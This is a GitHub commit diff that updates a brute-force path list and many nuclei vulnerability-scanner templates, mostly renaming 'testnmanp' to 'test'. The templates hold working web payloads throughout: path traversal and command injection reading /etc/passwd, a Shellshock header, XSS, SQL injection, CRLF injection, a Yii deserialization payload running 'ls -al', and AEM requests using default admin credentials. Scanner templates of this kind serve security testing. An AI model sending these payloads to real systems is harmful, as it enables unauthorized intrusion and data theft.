Skip to content

Commit dc5aebf

Browse files
committed
up PoCs 2022-09-29
1 parent 06bd379 commit dc5aebf

File tree

109 files changed

+1113
-150
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

109 files changed

+1113
-150
lines changed

brute/dicts/filedic.txt

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,3 +1,4 @@
1+
/_wpeprivate/config.json
12
/bea_wls_internal/classes/mejb@/org/omg/stub/javax/management/j2ee/_ManagementHome_Stub.class
23
!.gitignore
34
!.htaccess

config/nuclei-templates/51pwn/pay001.yaml

Lines changed: 8 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -222,9 +222,9 @@ requests:
222222
- "cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1"
223223
- "cgi-bin/faqmanager.cgi?toc=/etc/passwd%00"
224224
- "cgi-bin/faxsurvey?cat%20/etc/passwd"
225-
- "cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=testnmanp"
226-
- "cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=testnmanp"
227-
- "cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=testnmanp"
225+
- "cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
226+
- "cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
227+
- "cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
228228
- "cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1"
229229
- "cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|"
230230
- "cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00"
@@ -280,7 +280,7 @@ requests:
280280
- "cgi-bin/viewsource?/etc/passwd"
281281
- "cgi-bin/way-board.cgi?db=/etc/passwd%00"
282282
- "cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00"
283-
- "cgi-bin/webbbs/webbbs_config.pl?name=joe&email=testnmanp@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd"
283+
- "cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd"
284284
- "cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD"
285285
- "cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd"
286286
- "cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
@@ -319,9 +319,9 @@ requests:
319319
- "ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1"
320320
- "faqmanager.cgi?toc=/etc/passwd%00"
321321
- "faxsurvey?cat%20/etc/passwd"
322-
- "formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=testnmanp"
323-
- "formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=testnmanp"
324-
- "formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=testnmanp"
322+
- "formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
323+
- "formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
324+
- "formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
325325
- "forum-ra.asp?n=../../../../../../../../../etc/passwd"
326326
- "forum-ra.asp?n=../../../../../../../../../etc/passwd%00"
327327
- "forum-ra.asp?n=/etc/passwd"
@@ -486,7 +486,7 @@ requests:
486486
- "way-board.cgi?db=/etc/passwd%00"
487487
- "way-board/way-board.cgi?db=/etc/passwd%00"
488488
- "webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif"
489-
- "webbbs/webbbs_config.pl?name=joe&email=testnmanp@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd"
489+
- "webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd"
490490
- "webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd"
491491
- "webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD"
492492
- "webdist.cgi?distloc=;cat%20/etc/passwd"
Lines changed: 28 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,28 @@
1+
id: wpeprivate_leak
2+
3+
info:
4+
name: wpeprivate_leak
5+
author: 51pwn
6+
severity: critical
7+
description: |
8+
wpeprivate_leak
9+
metadata:
10+
tags: leak,config
11+
12+
requests:
13+
- method: GET
14+
path:
15+
- "{{BaseURL}}/_wpeprivate/config.json"
16+
17+
matchers-condition: and
18+
matchers:
19+
- type: status
20+
status:
21+
- 200
22+
- type: word
23+
part: body
24+
words:
25+
- '"VPENGINE_PHPSESSIONS":'
26+
27+
28+
# Enhanced by mp on 2022/09/29

config/nuclei-templates/cves/2007/CVE-2007-5728.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -20,7 +20,7 @@ info:
2020
requests:
2121
- method: GET
2222
path:
23-
- '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=testnmanp'
23+
- '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test'
2424

2525
matchers-condition: and
2626
matchers:

config/nuclei-templates/cves/2012/CVE-2012-3153.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -21,7 +21,7 @@ requests:
2121
- method: GET
2222
path:
2323
- "{{BaseURL}}/reports/rwservlet/showenv"
24-
- "{{BaseURL}}/reports/rwservlet?report=testnmanp.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"
24+
- "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"
2525

2626
req-condition: true
2727
matchers-condition: and

config/nuclei-templates/cves/2014/CVE-2014-4558.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@ info:
44
name: WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting
55
author: daffainfo
66
severity: medium
7-
description: A cross-site scripting vulnerability in testnmanp-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter.
7+
description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter.
88
reference:
99
- https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301
1010
- https://nvd.nist.gov/vuln/detail/CVE-2014-4558
@@ -19,7 +19,7 @@ info:
1919
requests:
2020
- method: GET
2121
path:
22-
- "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/testnmanp-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
22+
- "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
2323

2424
matchers-condition: and
2525
matchers:

config/nuclei-templates/cves/2014/CVE-2014-6271.yaml

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -23,11 +23,11 @@ requests:
2323
- "{{BaseURL}}"
2424
- "{{BaseURL}}/cgi-bin/status"
2525
- "{{BaseURL}}/cgi-bin/stats"
26-
- "{{BaseURL}}/cgi-bin/testnmanp"
26+
- "{{BaseURL}}/cgi-bin/test"
2727
- "{{BaseURL}}/cgi-bin/status/status.cgi"
28-
- "{{BaseURL}}/testnmanp.cgi"
28+
- "{{BaseURL}}/test.cgi"
2929
- "{{BaseURL}}/debug.cgi"
30-
- "{{BaseURL}}/cgi-bin/testnmanp-cgi"
30+
- "{{BaseURL}}/cgi-bin/test-cgi"
3131

3232
headers:
3333
Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "

config/nuclei-templates/cves/2016/CVE-2016-4977.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -21,7 +21,7 @@ info:
2121
requests:
2222
- method: GET
2323
path:
24-
- "{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://testnmanp"
24+
- "{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"
2525

2626
matchers-condition: and
2727
matchers:
Lines changed: 41 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,41 @@
1+
id: CVE-2017-17736
2+
3+
info:
4+
name: Kentico - Unauthenticated Administration Dashboard
5+
author: shiar
6+
severity: critical
7+
description: |
8+
Kentico 9.0 before 9.0.51 and 10.0 before 10.0.48 allows remote attackers to obtain Global Administrator access by visiting CMSInstall/install.aspx and then navigating to the CMS Administration Dashboard.
9+
reference:
10+
- https://www.exploit-db.com/ghdb/5694
11+
- https://nvd.nist.gov/vuln/detail/CVE-2017-17736
12+
- https://blog.hivint.com/advisory-access-control-bypass-in-kentico-cms-cve-2017-17736-49e1e43ae55b
13+
classification:
14+
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
15+
cvss-score: 9.8
16+
cve-id: CVE-2017-17736
17+
cwe-id: CWE-425
18+
metadata:
19+
google-dork: intitle:"kentico database setup"
20+
verified: "true"
21+
tags: cve,cve2017,kentico,cms,install,rce,unauth,edb
22+
23+
requests:
24+
- method: GET
25+
path:
26+
- "{{BaseURL}}/CMSInstall/install.aspx"
27+
28+
matchers-condition: or
29+
matchers:
30+
- type: word
31+
words:
32+
- "Kentico"
33+
- "Database Setup"
34+
- "SQLServer"
35+
condition: and
36+
37+
- type: word
38+
words:
39+
- "Database Setup"
40+
- "SQLServer"
41+
condition: and

config/nuclei-templates/cves/2018/CVE-2018-12300.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@ requests:
1919
- method: GET
2020

2121
path:
22-
- '{{BaseURL}}/echo-server.html?code=testnmanp&state=http://www.interact.sh#'
22+
- '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#'
2323

2424
matchers:
2525
- type: regex

config/nuclei-templates/cves/2018/CVE-2018-12613.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@ info:
44
name: PhpMyAdmin <4.8.2 - Local File Inclusion
55
author: pikpikcu
66
severity: high
7-
description: PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper testnmanp for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).
7+
description: PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).
88
reference:
99
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613
1010
- https://www.phpmyadmin.net/security/PMASA-2018-4/

config/nuclei-templates/cves/2019/CVE-2019-3799.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -20,7 +20,7 @@ info:
2020
requests:
2121
- method: GET
2222
path:
23-
- "{{BaseURL}}/testnmanp/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
23+
- "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
2424
matchers-condition: and
2525
matchers:
2626
- type: status
Lines changed: 53 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,53 @@
1+
id: CVE-2019-8086
2+
3+
info:
4+
name: Adobe Experience Manager XXE
5+
author: DhiyaneshDk
6+
severity: high
7+
description: Adobe Experience Manager versions 6.5, 6.4, 6.3 and 6.2 have a xml external entity injection vulnerability. Successful exploitation could lead to sensitive information disclosure.
8+
reference:
9+
- https://speakerdeck.com/0ang3el/a-hackers-perspective-on-aem-applications-security?slide=13
10+
- https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py
11+
- https://nvd.nist.gov/vuln/detail/CVE-2019-8086
12+
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-8086
13+
metadata:
14+
shodan-query:
15+
- http.title:"AEM Sign In"
16+
- http.component:"Adobe Experience Manager"
17+
tags: cve,cve2019,aem,adobe
18+
19+
requests:
20+
- raw:
21+
- |
22+
POST /content/{{randstr}} HTTP/1.1
23+
Host: {{Hostname}}
24+
Content-Type: application/x-www-form-urlencoded
25+
Authorization: Basic YWRtaW46YWRtaW4=
26+
Referer: {{BaseURL}}
27+
28+
sling:resourceType=fd/af/components/guideContainer
29+
30+
- |
31+
POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1
32+
Host: {{Hostname}}
33+
Content-Type: application/x-www-form-urlencoded
34+
Authorization: Basic YWRtaW46YWRtaW4=
35+
Referer: {{BaseURL}}
36+
37+
guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<afData>\u0041\u0042\u0043</afData>"}}}
38+
39+
matchers-condition: and
40+
matchers:
41+
- type: word
42+
part: body
43+
words:
44+
- '<afData>ABC<afBoundData/>'
45+
46+
- type: word
47+
part: header
48+
words:
49+
- application/json
50+
51+
- type: status
52+
status:
53+
- 200

config/nuclei-templates/cves/2020/CVE-2020-13483.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -20,7 +20,7 @@ requests:
2020
- method: GET
2121
path:
2222
- '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>'
23-
- '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(testnmanp)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'
23+
- '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'
2424

2525
stop-at-first-match: true
2626
matchers-condition: and
@@ -30,7 +30,7 @@ requests:
3030
part: body
3131
words:
3232
- '<a href="/*">*/)});function __MobileAppList(){alert(1)}//'
33-
- "function(handler){};function __MobileAppList(testnmanp){alert(document.domain);};//</div>"
33+
- "function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"
3434
condition: or
3535

3636
- type: word

config/nuclei-templates/cves/2020/CVE-2020-15148.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -21,7 +21,7 @@ info:
2121
requests:
2222
- method: GET
2323
path:
24-
- "{{BaseURL}}/index.php?r=testnmanp/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="
24+
- "{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="
2525

2626
matchers-condition: and
2727
matchers:

config/nuclei-templates/cves/2020/CVE-2020-17518.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -41,6 +41,6 @@ requests:
4141
matchers:
4242
- type: dsl
4343
dsl:
44-
- 'contains(body, "testnmanp-poc") && status_code == 200' # Using CVE-2020-17519 to confirm this.
44+
- 'contains(body, "test-poc") && status_code == 200' # Using CVE-2020-17519 to confirm this.
4545

4646
# Enhanced by mp on 2022/07/13

config/nuclei-templates/cves/2020/CVE-2020-9344.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -25,7 +25,7 @@ requests:
2525
- '{{BaseURL}}/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
2626
- '{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS'
2727
- '{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
28-
- '{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=testnmanp'
28+
- '{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test'
2929
- '{{BaseURL}}/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
3030
matchers-condition: and
3131
matchers:

config/nuclei-templates/cves/2021/CVE-2021-27132.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@ info:
1919
requests:
2020
- method: GET
2121
path:
22-
- "{{BaseURL}}/testnmanp.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"
22+
- "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"
2323

2424
matchers-condition: and
2525
matchers:
@@ -30,7 +30,7 @@ requests:
3030

3131
- type: word
3232
words:
33-
- "Content-Disposition: attachment;filename=testnmanp.txt"
33+
- "Content-Disposition: attachment;filename=test.txt"
3434
- "Set-Cookie:CRLFInjection=Test"
3535
- "Location: interact.sh"
3636
- "X-XSS-Protection:0"

config/nuclei-templates/cves/2021/CVE-2021-31589.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -24,7 +24,7 @@ info:
2424
requests:
2525
- method: GET
2626
path:
27-
- "{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=testnmanp%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password"
27+
- "{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password"
2828

2929
matchers-condition: and
3030
matchers:

config/nuclei-templates/cves/2021/CVE-2021-32789.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -22,13 +22,13 @@ info:
2222
requests:
2323
- method: GET
2424
path:
25-
- '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-testnmanp%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
25+
- '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
2626

2727
matchers-condition: and
2828
matchers:
2929
- type: word
3030
words:
31-
- 'sqli-testnmanp'
31+
- 'sqli-test'
3232
- 'attribute_counts'
3333
- 'price_range'
3434
- 'term'

config/nuclei-templates/cves/2021/CVE-2021-34473.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -21,8 +21,8 @@ info:
2121
requests:
2222
- method: GET
2323
path:
24-
- '{{BaseURL}}/autodiscover/autodiscover.json?@testnmanp.com/owa/?&Email=autodiscover/autodiscover.json%3F@testnmanp.com'
25-
- '{{BaseURL}}/autodiscover/autodiscover.json?@testnmanp.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@testnmanp.com'
24+
- '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com'
25+
- '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com'
2626

2727
matchers:
2828
- type: word

config/nuclei-templates/cves/2021/CVE-2021-36873.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -51,7 +51,7 @@ requests:
5151
dsl:
5252
- contains(all_headers_4, "text/html")
5353
- status_code_4 == 200
54-
- contains(body_4, 'blockcountry_blockmessage\">testnmanp</textarea><script>alert(document.domain)</script>')
54+
- contains(body_4, 'blockcountry_blockmessage\">test</textarea><script>alert(document.domain)</script>')
5555
- contains(body_4, '<h3>Block type</h3>')
5656
condition: and
5757

config/nuclei-templates/cves/2021/CVE-2021-41569.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@ info:
1919
requests:
2020
- method: GET
2121
path:
22-
- "{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=testnmanp&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=testnmanp&bgtype=COLOR"
22+
- "{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR"
2323

2424
matchers-condition: and
2525
matchers:

0 commit comments

Comments
 (0)